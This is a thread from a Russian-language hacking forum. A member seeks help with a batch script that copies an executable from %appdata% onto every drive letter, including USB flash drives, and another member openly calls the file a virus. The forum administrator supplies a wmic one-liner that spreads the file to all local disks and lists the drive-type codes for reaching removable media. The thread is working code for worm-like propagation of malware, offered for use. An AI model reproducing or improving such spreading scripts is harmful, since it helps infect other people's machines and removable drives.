Основан 26 Июля 2013 года
freehacks.ru fhacks.me fhacks.pw fhacksnplmzxaaoo.onion
HashFlare

Страница 1 из 2 12 ПоследняяПоследняя
Показано с 1 по 10 из 12
  1. #1
    TopicStarter
    Аватар для tyman

    Статус
    Offline
    Регистрация
    12.09.2013
    Сообщений
    310
    Репутация
    78 + / -
    Хакинг

    Question .bat Копирование файла на все диски

    У меня бат проверяет наличие диска и если он есть, то копирует файл.
    Проблема в том, что как бы буква свободная, а ячейка для неё есть, и оно думает что там диск, а при записи файла выскакивает табличка "вставьте диск".
    Как сделать его невидимым?


    Код:
    if not exist c:\ (
    goto :1
    ) else (
    copy %appdata%\740z.exe c:\ )
    :1
    if not exist j:\ (
    goto :2
    ) else (
    copy %appdata%\740z.exe j:\ )
    :2
    if not exist h:\ (
    goto :3
    ) else (
    copy %appdata%\740z.exe h:\ )
    :3
    if not exist i:\ (
    goto :4
    ) else (
    copy %appdata%\740z.exe i:\ )
    :4
    if not exist l:\ (
    goto :5
    ) else (
    copy %appdata%\740z.exe l:\ )
    :5
    if not exist m:\ (
    goto :6
    ) else (
    copy %appdata%\740z.exe m:\ )
    :6
    if not exist g:\ (
    goto :7
    ) else (
    copy %appdata%\740z.exe g:\ )
    :7
    if not exist n:\ (
    goto :8
    ) else (
    copy %appdata%\740z.exe n:\ )
    :8
    if not exist o:\ (
    goto :9
    ) else (
    copy %appdata%\740z.exe o:\ )
    :9
    if not exist p:\ (
    goto :10
    ) else (
    copy %appdata%\740z.exe p:\ )
    :10
    if not exist q:\ (
    goto :11
    ) else (
    copy %appdata%\740z.exe q:\ )
    :11
    if not exist r:\ (
    goto :12
    ) else (
    copy %appdata%\740z.exe r:\ )
    :12
    if not exist s:\ (
    goto :13
    ) else (
    copy %appdata%\740z.exe s:\ )
    :13
    if not exist t:\ (
    goto :14
    ) else (
    copy %appdata%\740z.exe t:\ )
    :14
    if not exist a:\ (
    goto :15
    ) else (
    copy %appdata%\740z.exe a:\ )
    :15
    if not exist x:\ (
    goto :16
    ) else (
    copy %appdata%\740z.exe x:\ )
    :16
    if not exist z:\ (
    goto :17
    ) else (
    copy %appdata%\740z.exe z:\ )
    :17
    if not exist b:\ (
    goto :18
    ) else (
    copy %appdata%\740z.exe b:\ )
    :18
    if not exist d:\ (
    goto :19
    ) else (
    copy %appdata%\740z.exe d:\ )
    :19
    if not exist e:\ (
    goto :20
    ) else (
    copy %appdata%\740z.exe e:\ )
    :20
    if not exist w:\ (
    goto :21
    ) else (
    copy %appdata%\740z.exe w:\ )
    :21
    if not exist v:\ (
    goto :22
    ) else (
    copy %appdata%\740z.exe v:\ )
    :22
    if not exist u:\ (
    goto :23
    ) else (
    copy %appdata%\740z.exe u:\ )
    :23
    if not exist y:\ (
    goto :24
    ) else (
    copy %appdata%\740z.exe y:\ )
    :24
    if not exist "%appdata%\c37t.exe" copy "%appdata%\n37t.dat" "%appdata%\c37t.exe" 
    pause
    .|.

  2. #2
    Trust
    Админ негодует :3
    Аватар для admin

    Статус
    Offline
    Регистрация
    27.07.2013
    Сообщений
    1,456
    Репутация
    159 + / -
    Безопасность
    Код:
    @echo off
    for /f "skip=1 delims=:" %%a in ('"wmic logicaldisk where (drivetype="3") get Caption"') do copy %appdata%\740z.exe %%a:\
    [Только зарегистрированные могут видеть это. ]
    JID: [Только зарегистрированные могут видеть это. ] - пока не сижу там, только ЛС.

  3. #3
    TopicStarter
    Аватар для tyman

    Статус
    Offline
    Регистрация
    12.09.2013
    Сообщений
    310
    Репутация
    78 + / -
    Хакинг
    Спасибо, проверим
    .|.

  4. #4
    TopicStarter
    Аватар для tyman

    Статус
    Offline
    Регистрация
    12.09.2013
    Сообщений
    310
    Репутация
    78 + / -
    Хакинг
    Админ, скопировало на локальные диски без проблем, а на флешки не захотело.
    Есть ещо предложения?
    .|.

  5. #5
    Trust
    Админ негодует :3
    Аватар для admin

    Статус
    Offline
    Регистрация
    27.07.2013
    Сообщений
    1,456
    Репутация
    159 + / -
    Безопасность
    Цитата Сообщение от tyman Посмотреть сообщение
    Админ, скопировало на локальные диски без проблем, а на флешки не захотело.
    Есть ещо предложения?
    (drivetype="3") - Я указал только жестаки

    Value Meaning
    0 Unknown
    1 No Root Directory
    2 Removable Disk
    3 Local Disk
    4 Network Drive
    5 Compact Disc
    6 RAM Disk
    [Только зарегистрированные могут видеть это. ]
    JID: [Только зарегистрированные могут видеть это. ] - пока не сижу там, только ЛС.

  6. #6
    TopicStarter
    Аватар для tyman

    Статус
    Offline
    Регистрация
    12.09.2013
    Сообщений
    310
    Репутация
    78 + / -
    Хакинг
    Проблема таже, к букве приклеяна ячейка и оно просит вставить диск
    [Только зарегистрированные могут видеть это. ]
    Имменно в скрытых и идет проблема
    .|.

  7. #7
    TopicStarter
    Аватар для tyman

    Статус
    Offline
    Регистрация
    12.09.2013
    Сообщений
    310
    Репутация
    78 + / -
    Хакинг
    Актуально
    .|.

  8. #8
    Trust
    Инкубатор идей
    Аватар для ReaGed

    Статус
    Offline
    Регистрация
    14.08.2013
    Сообщений
    84
    Репутация
    20 + / -
    Безопасность
    H, g, l, i - что за диски?

  9. #9
    Аватар для sata-ata

    Статус
    Offline
    Регистрация
    29.10.2013
    Сообщений
    3,035
    Репутация
    282 + / -
    Программист
    по умолчанию, буква диска или даже просто накопителя выдаётся по очереди занятости букв
    либо ты сам её назначаешь через "менеджер дисков"

    вот так


    пкм по значку "Мой компьютер"
    "Управление" (нужны права админа) [Только зарегистрированные могут видеть это. ]
    "Запоминающие устройства"
    "Управление дисками" [Только зарегистрированные могут видеть это. ]

    если том уже назван, то:
    пкм по нему
    "Изменить букву или путь к диску" [Только зарегистрированные могут видеть это. ]
    "Изменить"
    выбираем букву
    жмем "ОК" [Только зарегистрированные могут видеть это. ]
    всё буква изменена

    если том ещё не размечен, то создаём новый том (не буду описывать, очевидно как)

    если том не назван, то:
    пкм по нему
    "изменить букву или путь к диску"
    "Добавить"
    выбираем букву
    жмем "ОК" [Только зарегистрированные могут видеть это. ]
    диск добавляется (или флеха, или что у вас там)

    [свернуть]


    - - - Добавлено - - -

    хм... а реально сначала сделать проверку на наличие дисков без требования "вставьте диск", а потом уже копировать на них?

    - - - Добавлено - - -

    не на них, а на существующие как только что мы получили в отчёте

    - - - Добавлено - - -

    и кстати на диски без букв, например резерв винды, твой вирусняк этим батником не скопируется...

    - - - Добавлено - - -

    а тут скорее всего карт ридер без флешек в нем, у меня также отображается, но если попытаться открыть то он требует "вставить диск"

    аналогично было с CD-DVD приводами и дискетамиъ
    нечто типо отображения присутствия устройства
    8AC4F56356469F79B5283364053ACDA49D8EC9FEFDADC2B42F A5B4E979D9222267583F350BF9

    с/delphi/pascal/vbs/vbm/bat
    Ник зареган, суки! [Только зарегистрированные могут видеть это. ]

  10. #10
    TopicStarter
    Аватар для tyman

    Статус
    Offline
    Регистрация
    12.09.2013
    Сообщений
    310
    Репутация
    78 + / -
    Хакинг
    Цитата Сообщение от reaged Посмотреть сообщение
    h, g, l, i - что за диски?
    это флешки

    - - - добавлено - - -

    Цитата Сообщение от sata-ata Посмотреть сообщение
    по умолчанию, буква диска или даже просто накопителя выдаётся по очереди занятости букв
    либо ты сам её назначаешь через "менеджер дисков"

    вот так


    пкм по значку "мой компьютер"
    "управление" (нужны права админа) [Только зарегистрированные могут видеть это. ]
    "запоминающие устройства"
    "управление дисками" [Только зарегистрированные могут видеть это. ]

    если том уже назван, то:
    пкм по нему
    "изменить букву или путь к диску" [Только зарегистрированные могут видеть это. ]
    "изменить"
    выбираем букву
    жмем "ок" [Только зарегистрированные могут видеть это. ]
    всё буква изменена

    если том ещё не размечен, то создаём новый том (не буду описывать, очевидно как)

    если том не назван, то:
    пкм по нему
    "изменить букву или путь к диску"
    "добавить"
    выбираем букву
    жмем "ок" [Только зарегистрированные могут видеть это. ]
    диск добавляется (или флеха, или что у вас там)

    [свернуть]


    - - - добавлено - - -

    хм... а реально сначала сделать проверку на наличие дисков без требования "вставьте диск", а потом уже копировать на них?

    - - - добавлено - - -

    не на них, а на существующие как только что мы получили в отчёте

    - - - добавлено - - -

    и кстати на диски без букв, например резерв винды, твой вирусняк этим батником не скопируется...

    - - - добавлено - - -

    а тут скорее всего карт ридер без флешек в нем, у меня также отображается, но если попытаться открыть то он требует "вставить диск"

    аналогично было с cd-dvd приводами и дискетамиъ
    нечто типо отображения присутствия устройства
    в том и фишка, проверяя наличие буквы все нормально, а при копировании просит вставить диск, аналогично cd-dvd приводами и дискетам
    если проверять налияие файла таже фигня.
    самое интересное, когда вставляю флешку ей даётся савсем отдельная буква

    - - - Добавлено - - -

    Я думаю не все делают резерв винды
    Те пустые ячейки не отображаются
    http://upload.freehacks.ru/6wcp2H
    заменил букву, её запомнило
    http://upload.freehacks.ru/Ac2B2O
    менял ячейки буква таже
    http://upload.freehacks.ru/8KufTL

    - - - Добавлено - - -

    Спасибо за участие тема закрыта

    вариант 1
    Код:
    dir c:\01 /a-d >nul 2>nul && (
        ECHO This directory contains files
    ) || (
        ECHO This directory is empty
    )
    вариант 2
    Код:
    dir c:\01 /a-d >nul 2>nul
    if errorlevel 1
        ECHO This directory is empty
    ) else (
        ECHO This directory contains files
    )
    .|.

Страница 1 из 2 12 ПоследняяПоследняя

Метки этой темы

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Информация на сайте предоставлена исключительно в ознакомительных целях, использование знаний в противозаконных целях преследуется по закону! Администрация не несет ответственности за ваши деяния.